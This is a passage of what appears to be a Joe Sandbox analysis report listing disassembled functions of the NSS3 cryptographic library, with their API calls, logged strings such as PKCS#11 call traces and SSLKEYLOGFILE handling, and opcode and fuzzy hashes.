String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
API String ID: 1003633598-1612141141
Opcode ID: 935a883cf4fb29e9bd7df06bc2c5863f055b6fd8e5d365302f0ac29d3d05daf2
Instruction ID: 2a8690727917bfef1fb13c0214f31028a2c8f32183d96be49c625f10b30fd78e
Opcode Fuzzy Hash: 935a883cf4fb29e9bd7df06bc2c5863f055b6fd8e5d365302f0ac29d3d05daf2
Instruction Fuzzy Hash: 3841E435605025AFDB208F54DF4CEA937B5AB4235DF086474F4085BB12C73CA858DBE5

Function 6C76C980 Relevance: 33.3, APIs: 22, Instructions: 298memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,6C76AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C76C98E

Part of subcall function 6C760FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
Part of subcall function 6C760FF0: PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016
Part of subcall function 6C760FF0: PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,6C76AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C76C9A1

Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C

SECOID_FindOIDByTag_Util.NSS3(0000001A,?,?,?,6C76AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C76C9D3

Part of subcall function 6C760840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7608B4

SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000,?,?,?,?,6C76AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C76C9E6

Part of subcall function 6C75FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C758D2D,?,00000000,?), ref: 6C75FB85
Part of subcall function 6C75FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C75FBB1

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,6C76AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C76C9F5
PORT_ArenaAlloc_Util.NSS3(00000000,00000050,?,?,?,?,?,?,?,6C76AEB0,?,00000004,00000001,?,00000000,?), ref: 6C76CA0A
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,6C76AEB0,?,00000004,00000001), ref: 6C76CA33
SECOID_FindOIDByTag_Util.NSS3(00000019,?,?,?,?,?,?,?,?,?,?,?,?,6C76AEB0,?,00000004), ref: 6C76CA4D
SECITEM_CopyItem_Util.NSS3(00000001,?,00000000), ref: 6C76CA60
SEC_PKCS7DestroyContentInfo.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C76AEB0,?,00000004), ref: 6C76CA6D
PR_Now.NSS3 ref: 6C76CAD6
PORT_ArenaMark_Util.NSS3(00000000), ref: 6C76CB23
PORT_ArenaAlloc_Util.NSS3(00000000,0000005C), ref: 6C76CB32
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001), ref: 6C76CB64
SECOID_SetAlgorithmID_Util.NSS3(00000000,?,00000001,00000000), ref: 6C76CBBB
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C76CBD0
PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C76CBF6
PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C76CC18
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000001,00000000), ref: 6C76CC39
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C76CC5B

Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76116E

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C76CC69
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C76CC89

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$CopyItem_$AlgorithmAllocateArena_EncodeFindInteger_Tag_Value$ContentCriticalDestroyEnterErrorFreeInfoInitLockMark_PoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1766420342-0
Opcode ID: 7ca1264b51984222a0afa63c1c274af7893c9319a8ac320832846ed4ca1a810f
Instruction ID: f7f0771ce40bc162f11e319414ddc3a1b56e33109fe44b2e35a3a9ba4d4a4184
Opcode Fuzzy Hash: 7ca1264b51984222a0afa63c1c274af7893c9319a8ac320832846ed4ca1a810f
Instruction Fuzzy Hash: 72B19CB5E002469BEF00DF66CE44BAA7BB4BF18309F104125EC14A7B51EB71D9A4CBA1

Function 6C7429A0 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 292COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,^jql,00000001,00000000,?,6C716540,?,0000000D,00000000), ref: 6C742A39
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,^jql,00000001,00000000,?,6C716540,?,0000000D,00000000), ref: 6C742A5B
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,^jql,00000001,00000000,?,6C716540,?,0000000D), ref: 6C742A6F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,^jql,00000001), ref: 6C742AAD
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,^jql,00000001,00000000), ref: 6C742ACB
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,^jql,00000001), ref: 6C742ADF
PR_Unlock.NSS3(?), ref: 6C742B38
PR_Unlock.NSS3(?), ref: 6C742B8B

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,^jql,00000001,00000000,?,6C716540,?,0000000D,00000000,?), ref: 6C742CA2

Strings

@eql, xrefs: 6C7429E7, 6C742A1D
^jql, xrefs: 6C7429A5
@eql, xrefs: 6C742A18, 6C742A22

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSectioncalloc$ErrorImportK11_Public
String ID: @eql$@eql$^jql
API String ID: 2580468248-2064314036
Opcode ID: 2c6fbeca5de10612e881b7a9007d99331e411a2fa5e408af1565f92f738a802d
Instruction ID: 52ef27f13c2f1f7adf3184fae1cc1be038ad2ccad61df4be9153fb0780302f3a
Opcode Fuzzy Hash: 2c6fbeca5de10612e881b7a9007d99331e411a2fa5e408af1565f92f738a802d
Instruction Fuzzy Hash: 13B1CE70E002059FDB10DF69DA88BAAB7B5FF49308F548539EC45A7A12E731E861CB91

Function 6C744C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C744C4C
EnterCriticalSection.KERNEL32(?), ref: 6C744C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C744CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C744CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C744CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C744D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C744D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C744DB7

Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

TlsGetValue.KERNEL32 ref: 6C744DD7
EnterCriticalSection.KERNEL32(?), ref: 6C744DEC
PR_Unlock.NSS3(?), ref: 6C744E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C744E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C744E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C744E71
free.MOZGLUE(00000000), ref: 6C744E7A
PR_Unlock.NSS3(?), ref: 6C744EA2
TlsGetValue.KERNEL32 ref: 6C744EC1
EnterCriticalSection.KERNEL32(?), ref: 6C744ED6
PR_Unlock.NSS3(?), ref: 6C744F01
free.MOZGLUE(00000000), ref: 6C744F2A

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: ddbc292f4e6ba06b94ce3cbdfb291df7b4b938dc948710057c40906b822d1aa6
Instruction ID: b7453952d36d14c6f3ef9c351b111d2f27e1c8f188b9aa2b2aaa198cd598e68c
Opcode Fuzzy Hash: ddbc292f4e6ba06b94ce3cbdfb291df7b4b938dc948710057c40906b822d1aa6
Instruction Fuzzy Hash: 8BB123B5A002069FDB11EF68D949AAA77B4BF0931CF048134ED1597B01EB34E961EFD2

Function 6C796E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C796BF7), ref: 6C796EB6

Part of subcall function 6C6F1240: TlsGetValue.KERNEL32(00000040,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F1267
Part of subcall function 6C6F1240: EnterCriticalSection.KERNEL32(?,?,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F127C
Part of subcall function 6C6F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F1291
Part of subcall function 6C6F1240: PR_Unlock.NSS3(?,?,?,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F12A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C83FC0A,6C796BF7), ref: 6C796ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C796EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C796EFC
PR_NewLock.NSS3 ref: 6C796F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C796F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C796BF7), ref: 6C796F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C796BF7), ref: 6C796F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C796BF7), ref: 6C796FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C796BF7), ref: 6C796FFD

Strings

SSLKEYLOGFILE, xrefs: 6C796EB1
SSLFORCELOCKS, xrefs: 6C796F2B
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C796F4F
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C796FDB
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C796FF8
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C796EF7

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 9b0e442ef13fe34a1a91171820f702f1378e3572e5c9c7af173729bf1f89edd1
Instruction ID: b0dcc9a79554812cf0857b29131c004cd8051b391977c1d62ab5e583000b0569
Opcode Fuzzy Hash: 9b0e442ef13fe34a1a91171820f702f1378e3572e5c9c7af173729bf1f89edd1
Instruction Fuzzy Hash: F8A12BB2A599C087E760863DEE0135432B2AB9332EF588775E931C7ED5DB799440C3CA

Function 6C736D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C736D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C736DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C736DC3

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C736DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C736DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C736E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C736E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C736E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C736EB9

Strings

pulDigestLen = 0x%p, xrefs: 6C736E42
hSession = 0x%x, xrefs: 6C736D9E, 6C736DAE
(CK_INVALID_HANDLE), xrefs: 6C736DBC
pDigest = 0x%p, xrefs: 6C736E27
pData = 0x%p, xrefs: 6C736DF5
C_Digest, xrefs: 6C736D81
ulDataLen = %d, xrefs: 6C736E0E
*pulDigestLen = 0x%x, xrefs: 6C736EB4

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: 06b9d34c023a35b11c90064add2789638d3fd039590d6dadc22c31a93e92c3fb
Instruction ID: ac4cd96a87c3888e2e0e5bc1269d9067983875434e357b305cc1d7ba469ed869
Opcode Fuzzy Hash: 06b9d34c023a35b11c90064add2789638d3fd039590d6dadc22c31a93e92c3fb
Instruction Fuzzy Hash: E141E635605025AFDB219B55CE4DE6A3BB5BB4230CF046474F8099BB13DB38A958CBD2

Function 6C738820 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 6C738846
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C738874
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C738883

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C738899
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C7388BA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C7388D3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C7388EC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C738907
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C738979

Strings

pEncryptedPart = 0x%p, xrefs: 6C7388B5
C_DecryptVerifyUpdate, xrefs: 6C738841
hSession = 0x%x, xrefs: 6C73885E, 6C73886E
(CK_INVALID_HANDLE), xrefs: 6C73887C
*pulPartLen = 0x%x, xrefs: 6C738974
pulPartLen = 0x%p, xrefs: 6C738902
ulEncryptedPartLen = %d, xrefs: 6C7388CE
pPart = 0x%p, xrefs: 6C7388E7

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptVerifyUpdate
API String ID: 1003633598-2764998763
Opcode ID: ad7a648834a6eadeec671b8adb0e4433fa8ff510c4afccc4688a12d74767cc58
Instruction ID: e0c25457ef03feb921a052cdc00dc754390270daa9e2f2e7246cf59eaec3df5c
Opcode Fuzzy Hash: ad7a648834a6eadeec671b8adb0e4433fa8ff510c4afccc4688a12d74767cc58
Instruction Fuzzy Hash: 4641F675606015AFDB208B15DF4CEAA3BB5AB4230CF046476F8099BB13D738A858CBD2

Function 6C736960 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptUpdate), ref: 6C736986
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7369B4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7369C3

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7369D9
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C7369FA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C736A13
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C736A2C
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C736A47
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C736AB9

Strings

pEncryptedPart = 0x%p, xrefs: 6C7369F5
hSession = 0x%x, xrefs: 6C73699E, 6C7369AE
(CK_INVALID_HANDLE), xrefs: 6C7369BC
*pulPartLen = 0x%x, xrefs: 6C736AB4
pulPartLen = 0x%p, xrefs: 6C736A42
ulEncryptedPartLen = %d, xrefs: 6C736A0E
pPart = 0x%p, xrefs: 6C736A27
C_DecryptUpdate, xrefs: 6C736981

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptUpdate
API String ID: 1003633598-2105479268
Opcode ID: 61f8e36cd4c42204962df3d9718e931cd0446bc24ac2f71cd597a12e62600791
Instruction ID: 12bd8e463c58913d088aaea4165c97b15b336ca7fff20d38b2e6b420e89fc4a4
Opcode Fuzzy Hash: 61f8e36cd4c42204962df3d9718e931cd0446bc24ac2f71cd597a12e62600791
Instruction Fuzzy Hash: 3D41B535605025AFDB20CB15DF4CE6A3BB5BB4231DF44A474E4099BB12DB38A958CBD2

Function 6C739C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_LoginUser), ref: 6C739C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C739C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C739CA3

Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963

PR_LogPrint.NSS3(?,00000000), ref: 6C739CB9
PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6C739CDA
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C739CF5
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C739D10
PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6C739D29
PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6C739D42

Strings

ulUsernameLen = %d, xrefs: 6C739D3D
hSession = 0x%x, xrefs: 6C739C7E, 6C739C8E
(CK_INVALID_HANDLE), xrefs: 6C739C9C
pPin = 0x%p, xrefs: 6C739CF0
ulPinLen = %d, xrefs: 6C739D0B
pUsername = 0x%p, xrefs: 6C739D24
userType = 0x%x, xrefs: 6C739CD5
C_LoginUser, xrefs: 6C739C61

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
API String ID: 1003633598-3838449515
Opcode ID: 3e5b224960560c18deeabc443af5e71a4859300c018ae191c204348c7976a228
Instruction ID: ed919dd97fa37b5914555c78183de323d5c20778ace3cf8d78d834640f39b5ad
Opcode Fuzzy Hash: 3e5b224960560c18deeabc443af5e71a4859300c018ae191c204348c7976a228
Instruction Fuzzy Hash: 41411631605025ABDB218F55DF4EE6A3BB6AB5230DF446474F40D5BB13CB38A818CBD1

Function 6C76E8C0 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000001C,?,6C76E853,?,FFFFFFFF,?,?,6C76B0CC,?,6C76B4A0,?,00000000), ref: 6C76E8D9

